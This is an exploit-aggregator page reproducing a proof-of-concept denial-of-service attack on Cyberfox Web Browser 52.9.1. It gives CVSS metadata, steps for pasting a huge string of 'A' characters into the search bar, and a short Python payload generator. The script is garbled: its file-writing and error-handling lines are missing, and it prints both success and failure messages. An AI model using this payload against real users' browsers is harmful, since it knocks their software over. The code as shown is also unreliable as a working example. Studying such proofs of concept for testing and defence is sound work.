Cyberfox Web Brwoser 52.9.1 Denial Of Service

CVE Category Price Severity
CWE-20 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2021-09-27
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 0.02009 0.17619

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Cyberfox Web Brwoser 52.9.1 Denial Of Service
# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)
# Date: 2021-09-26 
# Exploit Author: Aryan Chehreghani
# Vendor Homepage:
# Software Link:
# Version: v52.9.1 (Possibly all versions)
# Tested on: windows

#[ About - Cyberfox ] :
#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture 
#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.

# [ Exploit/POC ] :
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Cyberfox Web Browser
# 3.Copy the content of the file "output.txt" & Paste  into the "search bar"
# 4.Crashed 

Overflow = "\x41" * 9000000
    print("[!] Creating %s bytes DOS payload...." %len(Overflow))
    print("[!] File Created !")
    print("File cannot be created")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum